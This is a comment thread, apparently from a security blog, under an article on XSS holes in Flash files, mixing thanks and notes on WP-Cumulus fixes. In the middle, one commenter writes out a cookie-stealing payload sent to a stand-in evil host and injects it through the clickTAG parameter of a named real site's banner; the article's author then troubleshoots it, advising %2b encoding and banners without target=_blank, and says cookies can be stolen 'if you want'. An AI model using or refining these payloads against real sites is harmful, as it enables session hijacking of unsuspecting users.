Коментарі для запису: XSS vulnerabilities in 8 millions flash files

від: MustLive

Thu, 18 Aug 2011 11:28:55 +0000

Allison, you are welcome.

I’m glad that you liked it.

від: allison fretman

Thu, 18 Aug 2011 00:00:16 +0000

very informative article.

Thanks

від: MustLive

Tue, 23 Mar 2010 14:03:57 +0000

Alam

You are welcome.

від: Alam

Tue, 23 Mar 2010 07:00:37 +0000

Great article, thanks for share.

від: MustLive

Sun, 21 Feb 2010 19:35:40 +0000

Jiet

First, you can use XSS holes not only for cookie stealing, but also for other attacks (like advanced XSS attacks or attacking browsers of the users with exploits).

Second, you can steal cookies if you want. Just do it right .

There seem to be a problem with the “+document.cookie” (or ‘+’ anything) part…

Flash banner at wildlifefocus.com is using target=_blank. And as I wrote in my article, in such flash files it’s not possible to get to cookies in Internet Explorer (particularly IE6), Mozilla and Google Chrome. The code will be executed not in context of the site.

But it works in Firefox 3 and Opera 9.52 - in these browsers the code will be executed in context of the site. But they still don’t give you normal possibility to read cookies. I.e. they give you to read test cookies (which were added to the browser, e.g. via Cookie Editor plugin for Firefox), but not read sites cookies.

So, first, you need to find flash file without target=_blank.

Second, use %2b instead of +. And the attack will work.

Here is an example for wie-man-sieht.net.

від: Jiet

Sat, 20 Feb 2010 16:43:39 +0000

STEALING COOKIES IS NOT THAT EASY - However reading cookies (and smell the delicious aroma, mmm…) IS!!! (and yes, I’m just kidding about the last one - and I don’t think silicium harddrive cookies are healthy anyway)

Ok, ok, let’s get to the point:

However may be able to use javascript to read the session cookies and sent it to another site to save it and use someone else his/her acount.

Example:

Run this code on the website you want to steal the cookie….
[code]
javascript:window.open(”http://JIETSEVILSITE.EVIL?stolencookie=”+document.cookie , “New”, “width=1,height=1,scrollbars=no”)
[/code]

But it just doesn’t seem to work if I put it after a ‘clickTAG’…
Example:

[code]
http://www.wildlifefocus.com/NLD/Sponsors/DaimlerChrysler_banner_468X60.swf?clickTAG=javascript:window.open(”http://JIETSEVILSITE.EVIL?stolencookie=”+document.cookie , “New”, width=1,height=1,scrollbars=no”)
[/code]

It opens a new window, but doesn’t sent the cookie to your site.
Or asks you if you want to save the file or just doesn’t open at all…
Depending on the browser.

There seem to be a problem with the “+document.cookie” (or ‘+’ anything) part… But Why?

від: MustLive

Wed, 13 Jan 2010 21:55:22 +0000

kgraeme, I informed the author of WP-Cumulus about HTML injection hole and he’d think about it. But because the core functionality of the plugin is vulnerable, it’ll be hard to fix this kind of vulnerability.

So for now only XSS hole in WP-Cumulus is fixed. And it’s unknown if HTML Injection hole will be fixed.

від: kgraeme

Wed, 13 Jan 2010 16:56:45 +0000

Ah, yes. Just tested it and yes it does still have HTML injection. That sucks.

від: MustLive

Wed, 13 Jan 2010 12:57:02 +0000

kgraeme Yes, I know it. After I informed developer of WP-Cumulus in November, Roy fixed XSS hole and wrote a post about it. But he didn't fix HTML Injection, so every tagcloud.swf file (with or without fixed XSS hole) can be used for HTML Injection attacks. I wrote about it in my article XSS vulnerabilities in 34 millions flash files.

від: kgraeme

Tue, 12 Jan 2010 16:01:17 +0000

The current version 1.2.3 of the wp-cumulus plugin appears to have fixed the XSS problem.